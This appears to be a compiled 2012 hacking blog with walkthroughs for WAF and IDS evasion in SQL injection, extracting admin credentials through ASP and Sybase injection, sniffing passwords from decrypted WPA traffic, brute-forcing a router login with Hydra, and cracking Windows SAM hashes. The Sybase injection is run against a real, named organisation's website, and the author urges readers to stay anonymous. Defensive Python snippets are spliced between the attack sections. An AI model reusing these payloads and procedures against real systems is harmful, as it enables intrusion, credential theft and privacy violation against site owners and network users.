Sunday, September 16, 2012

Windows Application Firewall bypassing and Intrusion Detection




First of all, what do you need?

* A vulnerable website (error based).
* A text editor to write down all filtered-out options.

Part 1: WAF bypassing

+-- Short explanation.
+-- Comments we can use.
+-- Splitting, replacing keywords.
+-- Capitalization.
+-- Combining methods.
+-- Using characters.
+-- Split the SQL statement.
+-- Encoding characters.

Part 2: Intrusion detection.


WAF Bypassing

WAF, Web Application Firewall, is an attempt by administrators to secure the network,
but with only a filter, as we all know, you can't do that 100%.

WAF bypassing is not that easy, remember this:
WAF bypassing is gambling.
If one word is filtered, try another.
Keep trying and combining until you get a hit.

What does a WAF file look like?

Code:
<?php
/*
 * Commented-out part of the original script: it trims and escapes every
 * request value before it can reach MySQL.
$_GET = array_map('trim', $_GET);
//$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
    $_GET = array_map('stripslashes', $_GET);
    //$_POST = array_map('stripslashes', $_POST);
    $_COOKIE = array_map('stripslashes', $_COOKIE);
    $_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
*/
// END OF ANTI MYSQL INJECTION

/* Logging */

// The requested URL (path plus query string) is what gets inspected.
$locatie = $_SERVER['REQUEST_URI'];

// Blacklist of keywords and characters. The original built this list twice;
// the second "Array()" assignment silently discarded the first entries, so the
// two lists are merged here. The empty string "" that the original also
// contained is dropped: an empty pattern matches nothing useful.
$array = array(
    "mysql", "query", ")", ";", "}", "<script>", "</script>",
    "INSERT", "DROPTABLE", "TRUNCATE", "UPDATE", "COOKIE",
    "FILES", "POST", "REQUEST", "SERVER", "%40", "%20",
    "WHERE", "VALUES", "SELECT", "FROM", "exit",
    "'", '"', ",", "`", "echo",
);

foreach ($array as $posinject) {
    // Case-insensitive substring match. The original used eregi(), which treats
    // each entry as a regular expression (so ")" is a regex error) and no longer
    // exists in PHP 7; stripos() is the check that was intended.
    if (stripos($locatie, $posinject) !== false) {
        $time = 'NOW()';

        // Log the hit: user id (constant ID defined elsewhere in the application),
        // client IP and the offending URL. The original inserted an undefined
        // $tijd here; $time is what was meant, and the URL is escaped so the
        // logger itself cannot be injected.
        mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
            VALUES ('" . ID . "', '" . $_SERVER['REMOTE_ADDR'] . "', '"
            . mysql_real_escape_string($locatie) . "', " . $time . ")") or die(mysql_error());

        // Send the visitor away and stop processing.
        header("Location: news.php");
        exit();
    }
}

This is a WAF PHP script.
As you can see, it filters out some important words and signs.
It logs the IP too, so it's important to be anonymous all the time.

Now comes the part where we need to bypass all of this.

WAF bypassing - comments we can use

First of all I would like you to have a look at these comments,
because these will already bypass a lot.
How do we use them, where do we use them and what exactly do they do?

Well, let's start with /**/, (), #, --, +--+, --+-, -- -, %20, /, //, <; changing a . into a , sometimes does the trick too.
/**/ is the most common one for us.
It allows us to execute full words in our query without them being filtered out.
Of course, if the WAF has more than one filter this could get tricky.

Using comment in practice:

Code:
www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3--+-

I get an error saying "forbidden", something something, with the word select in it (if you're lucky).
Then I need to bypass the filter for select too:

Code:
www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3--+-

But as you see in my WAF doc I am not that lucky,
and I get redirected to news.php because the file says so.

Let's try changing that with: +select+1,2,3--+-
Nope, I got filtered out again.

WAF Bypassing - Splitting, replacing keywords

To go further from where I ended before, I am going to split the code instead of using the comments.

Code:
www.[site].com/index.php?id=-1+uni>on+sel>ect+1,2,3--+-

There will be cases where this works, do not forget this one,
but not always.

There is another method called replacing the keywords.

Code:
www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3--+-

How does this work?
Well, we all know the WAF filters out union and select.
Look closely:
UNIunionON+SELselectECT
It will filter out the two embedded lowercase words (union and select).
When it has done that, we have requested exactly the same word from the database.
The filter is not good enough to replace that one.
If you're lucky, of course.

Another simple option:

WAF Bypassing - Capitalization

Some other easy method is simply capitalizing the SQL queries.
For example, instead of union, UnIoN; this could escape our WAF easily (in some cases)!

WAF Bypassing - Combining Methods

We can combine this with comments and other WAF bypass methods. Example:

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCt+1,2,3--+-

Combining these could get you off the radar fast, but this is all basic stuff, people.

You need to learn to combine as much as possible;
without a brain you can't WAF bypass.

A full line getting tables could look like this,
but it will probably get much worse:

Code:
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/)+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -

I also changed two other things here.
Changing the . to a , as I said before could get past the WAF radar,
and I changed the = at the end into like because it could also filter the = to something.

WAF Bypassing - using characters

By using a range of characters to bypass the filter we could get through the WAF.
The following characters can do this:

Code:
[], ;, :, \/, $, €, |, ?, ", ', *, %, £ and lots more.

By using these characters, in lots of cases union and select are not filtered, but the sign * is,
which means replacing the keywords would not work, as shown before in my tutorial.

We could do this instead:

Code:
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3--+-

This is not much different from splitting the keywords,
only here the * sign is filtered out, so the union+select will be complete as soon as it is filtered.

Some others, when filtered out:
we could do (uni)(on)+(sel)(ect)
or use the quotes 'uni"on'+'sel"ect'; this does not work with MsSQL.

WAF Bypassing - Split SQL statement

In some cases parts of the SQL statement are filtered out, for example union
or select.

This means that by splitting this and only using id=-1+union+1,2,3--+-, or the other way around,
we could bypass the filter.

WAF Bypassing - encoding characters

By encoding characters, for example the '
or the white space,
you could get through the WAF because it does not filter encoded characters.
IN MOST CASES THEY DO.
This is for when you get stuck, I guess.

You could look for double encoding characters by searching Google; I'll preview a few here.

single quote ' = %u0027
open ( = %u0028
close ) = %u0029
and a white space = %u0020

Single encoding is almost always filtered by the WAF, so try double.
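Every evasion in Part 1 exploits a filter that matches raw, un-normalized input and then strips what it found and forwards the rest. As an added example (not code from the original tutorial), the Python below canonicalizes a query-string value into the form the database parser will see before matching it against a subset of the PHP script's keyword list, and shows why removal-based filtering manufactures the very keywords it removes; the keyword subset and the function names are my own choices.

```python
import re
from urllib.parse import unquote

# Subset of the keyword blacklist from the PHP WAF script above.
KEYWORDS = ("union", "select", "from", "where", "insert", "update", "truncate")
KEYWORD_RE = re.compile(r"\b(" + "|".join(KEYWORDS) + r")\b", re.IGNORECASE)


def naive_strip(value: str) -> str:
    """Removal-based filtering: delete every occurrence of each blacklisted word.

    This is the behaviour the keyword-replacement trick relies on: removing
    'union' from 'UNIunionON' leaves 'UNION' behind, so the filter creates the
    keyword it was meant to remove.
    """
    out = value
    for kw in KEYWORDS:
        out = re.sub(re.escape(kw), "", out, flags=re.IGNORECASE)
    return out


def canonicalize(value: str) -> str:
    """Reduce a query-string value to what the SQL parser will actually see.

    Each step undoes one of the evasions listed above: double URL encoding,
    %uXXXX escapes, /*!...*/ and /*...*/ comments, '+' as space, mixed case.
    """
    s = value
    # Decode until stable, so %2527 -> %27 -> ' (double encoding) is undone.
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    # unquote() leaves %uXXXX escapes such as %u0027 alone; translate them here.
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    # MySQL executes the body of a /*!...*/ conditional comment: keep the body.
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)
    # Ordinary /*...*/ comments are whitespace to the parser.
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    # '+' in a query string is a space.
    s = s.replace("+", " ")
    return re.sub(r"\s+", " ", s).strip().lower()


def detect(value: str):
    """Return the first blacklisted keyword found after canonicalization, else None.

    A request that matches should be rejected (or, better, the query should be
    parameterized); stripping and forwarding is what makes the bypasses work.
    """
    m = KEYWORD_RE.search(canonicalize(value))
    return m.group(1) if m else None
```

The detector still flags ordinary text containing "from" or "where", which is why a keyword list is only a detection signal: the durable fix is a parameterized query, not a smarter blacklist.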

Now we should have covered the basics.
Let's step over to filter evasion.

PART 2: Intrusion Detection!

Intrusion detection systems stop us from doing or 1=1.
We need to bypass this intrusion detection in order to check for the vuln.

Example of an intrusion detection system rule:

Code:
alert tcp any any -> $HTTP_SERVERS $HTTP_PORTS (msg:"SQL Injection attack"; flow:to_server,established; content:"' or 1=1 --"; nocase; sid:1; rev:1;)

This is of course the simplest example I could give you.

This rule says:
alert when it sees this or 1=1 going to its HTTP servers / HTTP ports, and show the message msg: "SQL Injection attack".
That's it, but they could filter out a lot more.

Let's take it easy.
If the system says I can't do 1=1,
then why wouldn't I do 2=2? That simple.
But since or and = could be filtered apart from the or 1=1,
let's do this:
and 2 like 2
That should work.
Of course the security guy won't give up.

Like does not work? Then do this: 1 < 2. This means 1 is smaller than 2; the database should return true,
unless it is filtered.

We could do 2 > 1: 2 is bigger than 1, true.

This is so easy, it's like math.

Let's do: and 1230 - 1 like 1229
Works too.

Using Unicode to encode your input may work too.

You could use different encodings too.

This does not need any more explanation, I guess.
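The rule above only knows the literal string "' or 1=1 --", which is why 2=2, 2 like 2, 1 < 2, 2 > 1 and 1230 - 1 like 1229 all walk past it. Added example (not part of the original post): a Python detector that evaluates any comparison between two integer constants following AND/OR, so every arithmetic variant of the tautology is recognised as the same thing; the integer-only grammar and the function names are my own choices.

```python
import operator
import re

# "<and|or> <integer arithmetic> <comparison> <integer arithmetic>",
# e.g. "and 1230 - 1 like 1229". Only + - * and decimal integers are accepted.
_NUM = r"\d+(?:\s*[+\-*]\s*\d+)*"
CONST_CMP_RE = re.compile(
    r"\b(and|or)\s+(" + _NUM + r")\s*(<=|>=|<>|!=|=|<|>|like)\s*(" + _NUM + r")",
    re.IGNORECASE,
)
_CMP = {
    "=": operator.eq, "like": operator.eq,   # LIKE between two numbers behaves as equality
    "<>": operator.ne, "!=": operator.ne,
    "<": operator.lt, ">": operator.gt, "<=": operator.le, ">=": operator.ge,
}


def const_value(expr: str) -> int:
    """Evaluate integer arithmetic with + - * (multiplication binds tighter)."""
    tokens = re.findall(r"\d+|[+\-*]", expr)
    terms, ops = [int(tokens[0])], []
    for op, num in zip(tokens[1::2], tokens[2::2]):
        if op == "*":
            terms[-1] *= int(num)
        else:
            ops.append(op)
            terms.append(int(num))
    total = terms[0]
    for op, n in zip(ops, terms[1:]):
        total = total + n if op == "+" else total - n
    return total


def constant_comparisons(query: str):
    """List every (left, op, right, result) comparison of two constants after AND/OR.

    Instead of matching one spelling of the payload, the comparison is evaluated,
    so 2=2, 2 like 2, 1<2, 2>1 and 1230 - 1 like 1229 are all reported as true.
    """
    found = []
    for m in CONST_CMP_RE.finditer(query):
        left, op, right = m.group(2).strip(), m.group(3).lower(), m.group(4).strip()
        found.append((left, op, right, _CMP[op](const_value(left), const_value(right))))
    return found


def has_constant_comparison(query: str) -> bool:
    """True when the input compares constants at all. A false comparison such as
    'and 1=2' is the other half of a boolean probe, so both halves are worth an alert."""
    return bool(constant_comparisons(query))
```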

MsSQL Structured Query Language Injection








SQL injection on ASP is the same as on PHP, but with a few small changes.

So first of all we will find some site that is vulnerable and is on .asp.

So assume that you got a site with the name of

Code:
http://www.target.com/

Now find a page where the site is vulnerable to SQL injection.

You can check the vulnerability by adding a single quotation mark '
at the end of the URL, like


Code:
http://www.target.com/product.asp?id=13'

If you get this error...


Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'department_id=1024''.

/deptdet.asp, line 122

then this means the site is vulnerable to SQL injection. Now we are going to find the columns in it. Normally we use -- at the end of the string, but in this case we will be using #.

Code:
http://www.target.com/product.asp?id=13 order by 1#

Suppose that the site has 10 columns. When you use the query "order by 1#" (without the double quotation marks)
you will not get any error; the page will load normally. But when you use the query "order by 11#" (without the double quotation marks) you will get an error, which means that the site has 10 columns.

So we will get an error on this query


Code:
http://www.target.com/product.asp?id=13 order by 11#

But when we use this query, we will not get any error


Code:
http://www.target.com/product.asp?id=13 order by 10#

This tells us that the table has 10 columns.

Now we will write the query as...


Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10#

So now, in the next step, we need the name of a table to get the number of the largest visible column. Let me explain a bit: in simple SQL injection we use union select 1,2,3,4,5,6 -- and we get a number to extract information from the site; here we need a table name to get that visible column number.

So to get that number we are going to add the name of a table after union select 1,2,3,4,5,6,7,...,10.

In this case scripts for getting table names don't work most of the time (I tried some of them), so we will add table names manually. Normally table names are "admin, tbladmin, tbl_admin, user, users, login, info, email" etc. Suppose on the site we got an admin table that is visible. Now our URL will look like:

Code:
http://www.target.com/product.asp?id=13 union select 1,2,3,4,5,6,7,8,9,10 from admin#

After this we will get the number of the largest visible column, which we can use to get data from the site. Suppose we got columns 3, 7 and 6 visible.

So now we are going to use 3 to get information. All we have to do is put the name of a column instead of 3 in the string and we will get the username and password.

Now our URL will look like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,name,4,5,6,7,8,9,10 from admin#

Suppose we got a username instead of the number 3.

Then change the column name to the passwords column name
and you will get the password ;)
The URL will be like


Code:
http://www.target.com/product.asp?id=13 union select 1,2,passwords,4,5,6,7,8,9,10 from admin#
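The enumeration above works because product.asp pastes the id from the URL straight into its SQL. As an added example (not the target's code), here is that vulnerable pattern next to its fix on an in-memory SQLite database with constructed sample data; table and column names follow the tutorial (product, admin, name, passwords), the trailing # is dropped because SQLite does not use it as a comment, and the function names are my own.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the site: the product table the page queries and an
    admin table holding credentials. All rows are constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE product(id INTEGER, name TEXT, price INTEGER);
        INSERT INTO product VALUES (13, 'Widget', 10), (14, 'Gadget', 25);
        CREATE TABLE admin(id INTEGER, name TEXT, passwords TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'example-placeholder');
    """)
    return con


def lookup_vulnerable(con, raw_id: str):
    """product.asp style: the id from the URL becomes part of the SQL text, so a
    'union select' in it is executed and rows from any table come back."""
    return con.execute("SELECT id, name, price FROM product WHERE id=" + raw_id).fetchall()


def lookup_bound(con, raw_id: str):
    """Same query with a bound parameter: the value is compared as data and is
    never parsed as SQL, so the union payload simply matches no row."""
    return con.execute("SELECT id, name, price FROM product WHERE id=?", (raw_id,)).fetchall()


def lookup_safe(con, raw_id: str):
    """Bound parameter plus type validation: a non-numeric id is rejected outright,
    which is also the right moment to log the attempt."""
    if not raw_id.isdigit():
        raise ValueError("id must be a positive integer")
    return con.execute("SELECT id, name, price FROM product WHERE id=?", (int(raw_id),)).fetchall()


def rejects(con, raw_id: str) -> bool:
    """True if lookup_safe() refuses the value."""
    try:
        lookup_safe(con, raw_id)
    except ValueError:
        return True
    return False
```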

Error-based Sybase Structured Query Language Injection




So here we start with a site. I'm assuming you understand MySQL injection.

Put an ' at the end and you will see this:

Sybase: Server message: Unclosed quote before the character string ' '

Version Extraction

Now to get the version:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29--

So here it is:

Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006

Table Extraction

Now let's get some table names:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))--

Second table:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))--

Basically keep adding and name!='table name that you get'.

Here I guess I reached the end of the tables:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' and name!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import' and name!='publications' and name!='publications_new' and name!='radio' and name!='satellites' and name!='titles'))

Time to get columns. We will get the columns of boardMembers.

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery')))--

Column no. 1: city

Getting column 2:

Code:
http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery') and name!='city'))--

You get my point: just add and name!='column name that you get'.


Thanks for reading!

Wednesday, September 12, 2012

Analyzing / Monitoring network captures with dsniff




If you already have access to the network, be it open or encrypted with WEP or WPA, the capture files can show a lot of information on what the target network was up to.
The dsniff tool suite consists of dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf and webspy.

I'll be looking at:

urlsnarf shows the websites (URLs) which were visited
driftnet can show pictures from websites visited... (ooffff...)
dsniff can show passwords used in web forms
mailsnarf shows downloaded emails

Basically what we are doing is:

> capturing network traffic using airodump
> decrypting the network traffic using airdecap
> replaying the network traffic using tcpreplay
and using the above tools to check out the network session.

First stop is to identify the network that we want to monitor.

Code:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0


Locate the network, then specify the channel, BSSID and output file.

Code:
airodump-ng mon0 -c 4 --bssid 00:11:22:33:44:55 -w wpa

As we are capturing from a WPA network and want to decrypt later on, a handshake needs to be in the capture file.
(The packets will only be decrypted from the moment the handshake is obtained.)
So after starting the airodump capture, start a new console and deauth a user, forcing that user to reconnect and ensuring the handshake will be in the capture file;
(here I did the deauth attack twice just to be sure the handshake would be included)

Code:
aireplay-ng mon0 -0 -5 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00


In airodump we will see the handshake captured in the top right of the screen.


Now we (the target PC) happily browse away and after a while stop the airodump capture.

To decrypt the WPA capture file, we will use airdecap-ng.
To decrypt correctly we need the network ESSID, the capture file with the handshake and the WPA passphrase.

Code:
airdecap-ng -e ESSID -p 'wpa_password' wpa-01.cap


If successful, you will see x amount of packets decrypted and there will be a new file: wpa-01-dec.cap.
This is the decrypted cap file.

Now to see what results we were able to obtain!

Open a new console and startup urlsnarf, specifying the local interface:

Code:
urlsnarf -i lo

To replay the network session, we use tcpreplay on the local interface using the decrypted file:

Code:
tcpreplay -i lo wpa-01-dec.cap

In the console running urlsnarf you will see details coming by of the websites visited.

To speed up the replay, you can use the -t option to go as fast as is possible.

Code:
tcpreplay -i lo -t wpa-01-dec.cap

When the replay is completed it simply stops and you can close the other consoles after checking what you wanted to check.


You can run the tools together;
open up separate consoles for each tool, again specifying the local interface.

Code:
dsniff -i lo

Code:
mailsnarf -i lo

Code:
driftnet -i lo

(driftnet opens up a separate driftnet window showing the pictures)

Then when those are up, open a console and run tcpreplay -i lo wpa-01-dec.cap.

After visiting several sites, entering passwords on sites, checking my email in Outlook Express, checking several semi-decent sites ... *cough* ... my results were:

urlsnarf
works well in showing the URLs visited, nothing to remark on there.
Below, the results of checking out one of the UK's "finest" newspapers...


driftnet
Did not show the amount of pics I was expecting to see, but does show quite a few; it depends on the sort of sites visited, will need to do some more checking on this one.
Below, the result of browsing through said newspaper in the driftnet window. What class!
If NSFW... emigrate ;)


dsniff
Only worked on 1 out of 5 passworded sites I tried, not too impressed, but quite relieved to be honest!
The results from a browser game I am into:


mailsnarf
Sometimes showed emails I downloaded from Outlook Express, sometimes didn't.
When I had several mails it showed them; when I only had 1 to download, it didn't. Part of a result from the time it did work:


All in all not a flawless result, but definitely interesting and entertaining!

As yet I have been unable to get webspy working using tcpreplay, a shame as webspy is reportedly able to
show real-time internet use in a browser window, which I had hoped would be possible using tcpreplay as well.

Network mapping with Kismet-newcore + giskismet





First make a quick edit to the kismet.conf file; we can do this with nano:

Code:
nano /pentest/wireless/kismet-newcore/conf/kismet.conf


Just edit to make sure the GPS device is pointing correctly to ttyUSB0.

Ctrl + X (to close after amending)
Y (Yes to save)
Enter (to save as same file name)

Then start up GPSD and we're good to go.

Code:
gpsd /dev/ttyUSB0

So with Kismet-Newcore and GPS set to work, it was war-driving time!

So starting up kismet with the GPS:


In kismet go to Windows --> GPS Info


All is well, now it's just time to hop in the car and drive around a little!

When done, just exit kismet.

Now we can use giskismet, first inserting all information into a GISKismet database file, from which we can create .kml files to put in either Google Maps or Google Earth.

So in the directory where the kismet files are:

Code:
giskismet -x kismet_netxml_file.netxml


wireless.dbl will be created; then we can make some .kml files depending on what we want to see.

Code:
giskismet -q "select * from wireless" -o output_all.kml

The .kml file will be created in that same directory with all information on all access points seen and can then be opened with Google Earth.


If, for instance, you only want to show APs with the ESSID "linksys":

Code:
giskismet -q "select * from wireless where ESSID='linksys'" -o linksys.kml


Resulting .kml in Google Earth:


Showing only APs without any encryption:

Code:
giskismet -q "select * from wireless where Encryption='None'" -o None.kml


Showing only APs with WEP encryption:

Code:
giskismet -q "select * from wireless where Encryption='WEP'" -o WEP.kml

You can actually filter the input to this database on channel / ESSID / BSSID or encryption.


For instance:

Code:
giskismet -x kismet_netxml_file.netxml --channel 1 --encryption None

then

Code:
giskismet -q "select * from wireless" -o output.kml

This will give you a .kml file directly with only the networks which are on channel 1 without encryption.

Resulting .kml in Google Earth:


The amount of networks you see with either no encryption or WEP is really staggering.

Still trying to figure out how best to grep out the SSIDs for entering in my ESSID list for cracking hidden ESSIDs.
Wrote a bit of code that the blog wouldn't even let me post, so it must be rough! Will be reverting on that.

So got some help... thanks Gitsnik!

Still quite a mouthful, but gets the job done; am pleased to say that what I had, although ugly, actually worked as well ;)

Code:
grep SSID kismet-nettxt-file.nettxt | egrep -v 'BSSID|SSID [0-9]' | sed 's/.*://' | sed 's/"//' | sed 's/"//' | sort -f | uniq > ssid.txt

Still not 100% perfect, but I'm sure I will be able to 'prettify' (omg) it after some further resting, testing and trials.

So after some trial and error, and not a little help from Gitsnik:

Code:
grep SSID test.nettxt | egrep -v 'BSSID|SSID [0-9]' | cut -c 18- | sed 's/"//g' | sed 's/ *$//g' | sort -fu > ssid.txt

Seems to be pretty clean so far!


To make things a little easier on stripping out the SSIDs, I made a couple of scripts which I thought
I would share for the hell of it:

SSIDstrip_v0.1


ssidstrip_v0.1 can be downloaded here:


Or if you like a bit more to look at (and with some more safety built in to avoid accidental overwriting etc.):
SSIDstrip_v0.2
ssidstrip_v0.2 can be downloaded here:

Using Hydra after connecting to network




After gaining access to your network, you can check the strength of your router's access passwords by using a tool called Hydra from THC.
Hydra is a login / password brute-force cracker which uses password/dictionary files.

First we find our network and do what is needed to log in.
In this case my test setup is:

* Eee PC 900, using the built-in Atheros wireless.
* Open network with hidden SSID on channel 3, no clients attached, no MAC filtering enabled.

Code:
airmon-ng stop ath0
airmon-ng start wifi0
airodump-ng ath0 -f 1500 -t OPN -a

(using the -f option to slow down the channel hopping and the -t option to show only open networks)



After finding the network and relevant info with airodump, I'll use my custom SSID wordlist to crack the hidden SSID:

Code:
mdk3 ath0 p -c 2 -t 00:13:D4:09:32:60 -f /mnt/sda1/ssid.txt -s 50

Depending on how often the AP sends beacons it can take a while to start; it will also show other networks broadcasting.


So now we have all the info we need to connect to this open network.
We start by stopping the wireless interface, which is still in monitor mode,
recreate it in managed mode, then enter the information we have acquired to access the network and check for success:

Code:
airmon-ng stop ath0
wlanconfig ath0 create wlandev wifi0 wlanmode sta
iwconfig ath0 channel 2 essid TEST ap 00:13:D4:09:32:60
ifconfig ath0 up
iwconfig ath0


Success! (See the link quality? We have a connection!)

Now to see whether the AP has DHCP enabled so we can automatically get an IP address, using dhcpcd with the -t option to give a time limit and -d to give some extra info on our MAC and IP address when one is given.
When successful we can do a netstat to see what IP address the router (gateway) is using:

Code:
dhcpcd -t 30 -d ath0
netstat -nr


So now we know that the router can be found on IP address 192.168.200.1; let's try to log in using some standard password combinations...


No luck..


OK, so now we will attempt to use Hydra.
Note the address line in the browser: http://192.168.200.1/index.asp
I have wordlists stored on my sda1 drive which have been prepared using a combination of default passwords and regularly used ones.

Code:
hydra 192.168.200.1 -L /mnt/sda1/login.txt -P /mnt/sda1/password.txt -t 2 -e ns -f http-get /index.asp

This can take a while, so to speed things up I tweaked my custom wordlist a bit.


Success!

So now, using the working login and password found above, we try to log in again:


We're in!


So now we are in the router and can make changes as we see fit!
And make sure that the security is increased...

Cracking Windows login passwords

Mkay, let's check out the whole philosophy around Windows logins.

The scenario is that you do not have access to Windows; you need the login and password
(and thus of course a second PC to do the cracking).

The tools used were:

* BackTrack 3 Final live-usb
[www.remote-exploit.org]
* Ophcrack (using the XP special rainbow tables)
[www.ophcrack.sourceforge.net]

The hack / crack is based on having physical access to the machine in question, and assumes it is running Windows XP.
Basically the sequence of events is as follows -->
* Boot up with the BackTrack live-usb/cd;
* Copy the files from the Windows system with the logins and passwords, and the keys to extract them;
* Extract the hashes from the SAM file;
* Crack the hashes using Ophcrack.

After booting up BT3 and opening a shell, type the 'df' command to see which drives are mounted:

Code:
df

In this case sda1 and sda2 are on the laptop; the sda2 partition has Windows on it.
sdb1 is my flash drive running BT3 and sdc is my extra flash drive for saving the password hashes later, as I will crack these on my other PC.


Now to head over to the directory in the Windows partition to find and copy the files we need to work with, which are the SAM file and the SYSTEM file.

Code:
cd /mnt/sda2/WINDOWS/system32/config/
ls


Now to copy the SAM and SYSTEM files to the flash drive.


Code:
cp SAM /mnt/sdc/
cp SYSTEM /mnt/sdc/


Now that we have the files we need, we switch to the folder where we copied them and use the tool 'bkhive' to extract the information necessary to dump the hashes from the SAM file.

Code:
cd /mnt/sdc/
bkhive system key

Now we can use the key to dump the hashes from the SAM file using the tool 'samdump2'.

Code:
samdump2 sam key

To copy the hashes to a text file for cracking later:

Code:
samdump2 sam key > /mnt/sdc/hashes.txt


So now we have a list of users and the hashes of their passwords in the file 'hashes.txt'.
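Before the cracking step it helps to know why the XP tables work at all: Windows XP stores an LM hash next to the NT hash unless the NoLMHash policy is set or the password is at least 15 characters long, and the LM hash splits the upper-cased password into two independent 7-character halves. Added example (not code from the original post): a Python audit of a pwdump-format dump like the one samdump2 writes, with constructed placeholder hashes, that flags the accounts those tables would crack; the function names and issue labels are my own.

```python
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of an empty password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of an empty password
EMPTY_LM_HALF = EMPTY_LM[16:]                   # LM half of an empty 7-char block

# Constructed sample in the 'user:rid:lmhash:nthash:::' format that samdump2
# produces. Every non-empty hash below is a placeholder, not a real hash.
SAMPLE_HASHES = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1003:0f1e2d3c4b5a6978aad3b435b51404ee:fedcba9876543210fedcba9876543210:::
bob:1004:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""


def parse_pwdump(text: str):
    """Parse pwdump lines into dicts; blank lines and # comments are skipped."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        accounts.append({"user": fields[0], "rid": int(fields[1]),
                         "lm": fields[2].lower(), "nt": fields[3].lower()})
    return accounts


def audit(accounts):
    """Map each user to the weaknesses a rainbow-table attack would exploit."""
    nt_owners = {}
    for a in accounts:
        nt_owners.setdefault(a["nt"], []).append(a["user"])
    findings = {}
    for a in accounts:
        issues = []
        if a["nt"] == EMPTY_NT:
            issues.append("empty-password")
        if a["lm"] != EMPTY_LM:
            # An LM hash is present: the password is at most 14 characters,
            # case-insensitive and split into 7-char halves, which is exactly
            # what the XP tables are built to crack. Fix: NoLMHash policy or
            # passwords of 15+ characters, after which only the NT hash is kept.
            issues.append("lm-hash-stored")
            if a["lm"].endswith(EMPTY_LM_HALF):
                # Second half equals the empty block: password is 7 chars or less.
                issues.append("password-7-chars-or-less")
        if a["nt"] != EMPTY_NT and len(nt_owners[a["nt"]]) > 1:
            others = [u for u in nt_owners[a["nt"]] if u != a["user"]]
            issues.append("password-shared-with:" + ",".join(others))
        findings[a["user"]] = issues
    return findings
```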


PART 2: Cracking the one-way hashes with Ophcrack

Ophcrack is a free Windows password cracker that uses rainbow tables (pre-computed password hashes). It can be run off a live-cd as well; however, I found the actual installed program to better fit my purpose.

There are a couple of rainbow tables free for download; these will normally grab the easy passwords. However, I had the most success with the 'XP special' rainbow tables.
These include more characters, and although it obviously takes longer to crunch the numbers, the results are fantastic.

So, assuming Ophcrack is installed on your system and that you have downloaded at least the 'XP free small' and the 'XP free fast' tables:

Fire up Ophcrack, click on the 'Tables' icon and install the tables by browsing to the directory where they are located. Click OK and the screen should look something like the below.


Next click on the 'Load' icon, choose 'PWDUMP file' and browse to your 'hashes.txt' file that was made in the previous step with BT3.

Then click on the 'Crack' icon and let Ophcrack do its thing. It is a CPU-intensive process and took my lowly PC over 4 min to complete.

Without success using the XP free fast tables...


So there you have it; the longest part of doing the above will be downloading the tools and tables ;)

An optimized way to do the above is to get an 8 GB thumb drive (the XP special tables are over 7 GB, whereas the tables included on the Ophcrack live-cd are under 400 MB and contain a lot fewer possible passwords), make it a bootable Ophcrack USB drive and replace the tables in the Ophcrack/tables directory with the XP special tables.
Doing this enabled me to do the above in one step by booting into the system with the Ophcrack live-usb and carrying out the Windows password cracks directly.
